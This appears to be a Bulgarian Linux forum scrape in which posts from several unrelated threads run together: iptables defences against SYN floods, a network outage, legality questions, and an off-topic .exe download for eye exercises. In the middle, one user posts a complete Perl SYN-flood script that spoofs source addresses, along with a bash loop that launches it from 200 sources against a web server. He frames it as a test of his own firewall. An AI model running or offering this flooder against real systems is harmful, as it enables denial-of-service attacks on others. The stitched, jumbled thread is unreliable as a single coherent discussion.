Това е много деликатен въпрос.
Тук има една тема по този въпрос :http://forums.megalan.bg/lofiversion/index.php/t26557.html без да правя реклами

OK.
Всичко което трябва да направиш е да прочтеш това тук - http://linux.die.net/man/8/iptables

Много хора си казват, че като мината на линукс и проблема им е решен, да ама не, трябва да седнеш
и да прочетеш и да изпробваш и да конфигурираш и т.н.

Успех 

Коя услуга ти флудват.
какво означава "удп"  и "ЦС".

Интересно ми е дали съм разбрал правилно - имали си наякакъв сървър под windows, сядаш пред този
същия windows и почваш да си жулиш икрички и в същото време ти правят потоп някакви лапета с флуудери под ръка.

Драги ми freedj, усещам че syn защитата ти нещо не работи.
При рефреша от браузера се прекъсват кънекците и се случват нови.
т.е. трябва да обраничиш например с hashlimit (мисля че беше) скороста на подаване на syn пакети .

Дай изхода от

Код

GeSHi (Bash):
netstat -tnap

поне да видим за какво става въпрос.

явно някой ме атакува но немога да разбера с какво не е SYN защото съм конфигурирал защита която работи на 100%.

Не се заяждам, но може ли да споделиш как конфигурира 100 % защита, защото според мен ако реши целия китайски народ да те атакува спасение няма.

Пробва ли някакво правило с recent модула на iptables

По-скоро би станало така:

Код

GeSHi (Bash):
chmod -R o-rxw /home/tolostoi/

Linux-а e законен да се инзползва в офис или във фирма.
Не е законно да пишеш бългаски думи с латински букви в този форум.
Относно това дали е законно да разработвате софтуер, зависи ако ще ограбвате банки
е незаконно ...

Колеги и аз да се включа в тази интересна тема.
Ако може да ми дадете малко акъл за ipt_recent аз също изчето темата (съвета) на VladSun
Не мога да сетна параметъра :

Код:

modprobe ipt_recentt ip_list_tot=500

Симулирах една syn ataka и когато атакуващите са под 100 -на се държи добре .т.е. отрязва достъпа  на лошите, но котато са повече от 100 почти не сработва
Ето как пробвах защитната си стена:

Код

GeSHi (Bash):
#!/bin/bash
for (( c=1; c<=200; c++ ))
do
perl synflood.pl 192.168.0.$c 192.168.0.224 80 &
done
 

Съдържанието на synfloog.pl

Код

GeSHi (Bash):
#!/usr/bin/perl
# synflood.pl - Simple SYN Flooder
# Author: iphelix
#
# Requires perl, Net::RawIP module, and root privileges
 
use Net::RawIP;
 
if($#ARGV == 2) {
   ($src,$dst,$port) = @ARGV;
   $a = new Net::RawIP;
   while(1) {
       $src_port = rand(65534)+1;
      $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
      $a->send;   
   }
} else {
   print "./synflooder source_ip destination_ip destination_port\n";
}
 

Ако може да датете някакви насоки ...

Код

GeSHi (Bash):
uname -a
Linux router3 2.6.31.5-127.fc12.i686.PAE #1 SMP Sat Nov 7 21:25:57 EST 2009 i686 athlon i386 GNU/Linux
 

Някой сетили се да види какво пише в /var/log/message.
Пробвай да спреш iptables
Пробвай за пинг DNS-те и после 194.153.145.104, ако имаш пробвай: dig abv.bg , links abv.bg
Нищо не ти пречи да пробваш с нова карта 8 лева е с ДДС.

Когато "забие" интернета торента продължава ли да се сваля, това е важно (може да видиж например с iptraf).
Не си писал по какъв начин идва интернета - eth pppoe ?
Като рестартирап network-a оправят ли се нещата

Това е интересен подход. Поне можеше да я спреш, като не ти върши никаква работа.

dvbb,
Мисля че се опитваш да хванеш риба с голи ръце.
Защо не спираш трафика на GW спрямо дадените клиенти (ИП-та), което може да се окаже безмисленно,  ако твойте клиенти могат да си сменяват ИП-та.

iptables -I FORWARD -s 192.168.0.3 -j DROP
iptables -I FORWARD -d 192.168.0.3 -j DROP

П.П.
Дори да им забраниш да си резолват, напрактика не им режеш достапа до интернет.

А бе момчета какво направихте с тази тема, аз ви предлагам упражнения за очите, които доста помагат, а вие изписахте един тон щуротии

Здравейте колеги,
не знам дали точно тук трявбваше да пусна тази тема, но както и да е.

Всички знаем колко много време прекарваме пред монитора и ни се уморяват очите, за това ще ви
предложа няколко упражнения за очите, които аз съм изпробвал и имат доста голям ефект.
Заитересованите трябва да ги правят 3 пъти дневно.
Изтегляне от тук: http://depositfiles.com/en/files/6836423

П.П.
Малко е кофти, че е .ехе, но с wine върви нормално.

R3sp3k7,
човека ти казва ДОКАТО инсталира, не го е инсталирал още, сещаш ли се

обърках се